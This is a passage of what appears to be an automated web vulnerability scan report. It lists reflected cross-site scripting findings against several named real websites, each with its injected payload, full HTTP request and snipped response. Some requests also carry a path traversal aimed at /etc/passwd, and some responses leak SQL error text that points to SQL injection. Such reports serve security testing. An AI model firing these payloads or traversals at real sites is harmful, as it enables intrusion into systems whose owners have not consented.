Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Set-Cookie: sessionKey=0f5e93eb-bc1c-4837-8c4d-3e0520321779; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 79952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/services/uniGC.aspx?xpST=ServiceList&171ed<script>alert(1)</script>5282bc75c4e=1&pdf=yes</div>
...[SNIP]...
5.84. http://www.hunton.com/sitemap/uniGC.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hunton.com
Path:   /sitemap/uniGC.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload da934<script>alert(1)</script>3e05beb1325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitemap/uniGC.aspx?xpST=SiteMap&da934<script>alert(1)</script>3e05beb1325=1 HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.9.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=1843; PortletId=5980402; SiteId=1837; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=7

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 23:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1856; path=/
Set-Cookie: PortletId=5993402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43948


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...
<div id="PDFBuilderUrl">http://www.hunton.com/sitemap/uniGC.aspx?xpST=SiteMap&da934<script>alert(1)</script>3e05beb1325=1&pdf=yes</div>
...[SNIP]...
5.85. http://www.millerwelds.com/financing/images/powerline_bg.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b81e"><a>049843051a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /financing9b81e"><a>049843051a/images/powerline_bg.png HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 29471
Date: Fri, 06 May 2011 19:12:49 GMT
X-Varnish: 1128245960
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.234
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonfinancing9b81e"><a>049843051a">
...[SNIP]...
5.86. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f484e"><a>625578a4d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /financingf484e"><a>625578a4d6c/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:16:25 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=2F0D48C83588BD513834025B16A967C1; path=/
Content-Length: 29472

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonfinancingf484e"><a>625578a4d6c">
...[SNIP]...
5.87. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 816ba"><a>15c94e97594 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images816ba"><a>15c94e97594/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:17:50 GMT
Connection: Keep-Alive
Content-Length: 29469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages816ba"><a>15c94e97594">
...[SNIP]...
5.88. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b074f"><a>71be161f337 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /imagesb074f"><a>71be161f337/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:17:53 GMT
Connection: Keep-Alive
Content-Length: 29469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimagesb074f"><a>71be161f337">
...[SNIP]...
5.89. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b61d"><a>e7d8c4ea814 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images3b61d"><a>e7d8c4ea814/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:18 GMT
Connection: Keep-Alive
Content-Length: 29469

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
<ul id="navonimages3b61d"><a>e7d8c4ea814">
...[SNIP]...
5.90. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7929e"><script>alert(1)</script>0cf3a3566af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7929e"><script>alert(1)</script>0cf3a3566af HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:42:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=4828c9086240b05a75dc6f5945149ffa; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11910


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/favicon.ico7929e"><script>alert(1)</script>0cf3a3566af" />
...[SNIP]...
5.91. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 268aa"><script>alert(1)</script>0b9b1b103ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes268aa"><script>alert(1)</script>0b9b1b103ed/javascript.php?script=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:43:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=6286bcccdf9244b14f4c5d4e0ec8c530; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11905


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes268aa"><script>alert(1)</script>0b9b1b103ed/javascript.php" />
...[SNIP]...
5.92. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61954'><img%20src%3da%20onerror%3dalert(1)>e1973efe892 was submitted in the REST URL parameter 1. This input was echoed as 61954'><img src=a onerror=alert(1)>e1973efe892 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /includes61954'><img%20src%3da%20onerror%3dalert(1)>e1973efe892/javascript.php?script=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:43:49 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=dd8b8adc8c3df31586ded6a4b8474fe0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11944


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<a href='/includes61954'><img src=a onerror=alert(1)>e1973efe892/index.php' class='nav_select'>
...[SNIP]...
5.93. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /includes/javascript.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1ba3"><script>alert(1)</script>d9197f98711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/javascript.phpc1ba3"><script>alert(1)</script>d9197f98711?script=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303691684.4.3.utmgclid=CKvepPW1tqgCFctw5QodwGjRAw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303677881.1303691684.4

Response

HTTP/1.1 404 Not Found
Date: Fri, 06 May 2011 21:44:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=6be516bd9caff38d3bd22c4084b6a71f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11925


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/includes/javascript.phpc1ba3"><script>alert(1)</script>d9197f98711" />
...[SNIP]...
5.94. http://www.nutter.com/attorneys.php [AttorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The value of the AttorneyID request parameter is copied into the HTML document as plain text between tags. The payload da30a<a>aabeeb049ba was submitted in the AttorneyID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /attorneys.php?AttorneyID=59da30a<a>aabeeb049ba HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?letter=G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:25 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 9247

error: Unknown column '59da30a' in 'where clause' | 1054<BR>sql: SELECT FirstName,LastName,MiddleName,Suffix FROM attorneys WHERE AttorneyID=59da30a<a>aabeeb049baerror: Unknown column '59da30a' in 'where clause' | 1054<BR>
...[SNIP]...
5.95. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CareerID request parameter is copied into the HTML document as plain text between tags. The payload 29f2f<script>alert(1)</script>c598fd7bcc0 was submitted in the CareerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers.php?CategoryID=22&CareerID=429f2f<script>alert(1)</script>c598fd7bcc0&subID=1 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:19:42 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 8570

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
' AND M.MediaTitle LIKE 'header%' AND M.MediaID=R1.FieldValue AND R1.TableName='_media' AND R1.KeyID=R2.KeyID AND R2.TableName='careers' AND R2.FieldValue=X.CareerID AND X.IsActive='y' AND X.CareerID=429f2f<script>alert(1)</script>c598fd7bcc0 LIMIT 1<br />
...[SNIP]...
5.96. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 4c89d<a>50084c84a3a was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /careers.php?CategoryID=224c89d<a>50084c84a3a&CareerID=4&subID=1 HTTP/1.1
